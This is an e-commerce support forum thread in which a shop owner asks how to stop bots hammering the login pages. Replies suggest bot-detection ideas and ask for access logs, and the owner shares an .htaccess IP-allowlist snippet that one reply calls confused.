Now my problem is the normal customer login is getting hammered. There does not seem to be a solution to this. I can't block every single IP, this bandid only last a few seconds and the move to another IP. I don't know what to do other than living with it. I would gladly pay for a real solution.
2023-03-28 9:57:49 - PHP Warning: Undefined array key "g-recaptcha-response" in /home/123/Store123/modification/admin/controller/common/login.php on line 115

2023-03-28 10:42:37 - PHP Warning: Undefined array key "g-recaptcha-response" in /home/123/Store123/modification/admin/controller/common/login.php on line 115
2023-03-28 10:42:49 - PHP Warning: Undefined array key "g-recaptcha-response" in /home/123/Store123/modification/admin/controller/common/login.php on line 115

this goes on to infinity but the post limit is 20,000 characters

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by ADD Creative » Wed Mar 29, 2023 5:10 am

There is usually something a bot does that that a customers wouldn't. Such as a POST with no data. See the topics below for more ideas.

viewtopic.php?t=230843
viewtopic.php?t=225771

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by JNeuhoff » Wed Mar 29, 2023 5:31 am

@SScott : What's exactly in your access.log ? It could be similar to what was discussed in this forum thread.

Export/Import Tool * SpamBot Buster * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Tag Manager * Survey Plus * OpenTwig


User avatar
Guru Member

Posts

Joined
Wed Dec 05, 2007 3:38 am


Post by SScott » Wed Mar 29, 2023 10:22 pm

JNeuhoff wrote:
Wed Mar 29, 2023 5:31 am
@SScott : What's exactly in your access.log ? It could be similar to what was discussed in this forum thread.
Yes sir it is. I tried your htaccess method and it did not seem to work so I tried adapting just the RewriteRule to mine that I am using and that did not work so not sure what I did wrong. The way I have it now is working but it is a pain when the girl who does CS uses her phone and is away and I am not near anything to add her new IP.

I am using this for the admin page (and the customer login page I installed an extension the use reCaptcha. I tried installing V3 but could not get it to work so went back to V2 and did the option for invisible)

Code: Select all

 RewriteCond %{REMOTE_ADDR} 0.0.0.0 [OR]
 RewriteCond %{REMOTE_ADDR} 0.0.0.1
 RewriteRule .* - [L] #do notthing
 RewriteRule .* https://www.websitehere.com/ [R=302,L]

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by JNeuhoff » Wed Mar 29, 2023 11:28 pm

This htaccess doesn't make sense to me.

Anyway, what's in your server's access.log ? That info might help to work out a proper .htaccess content.

Export/Import Tool * SpamBot Buster * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Tag Manager * Survey Plus * OpenTwig


User avatar
Guru Member

Posts

Joined
Wed Dec 05, 2007 3:38 am

Who is online

Users browsing this forum: alanjones and 83 guests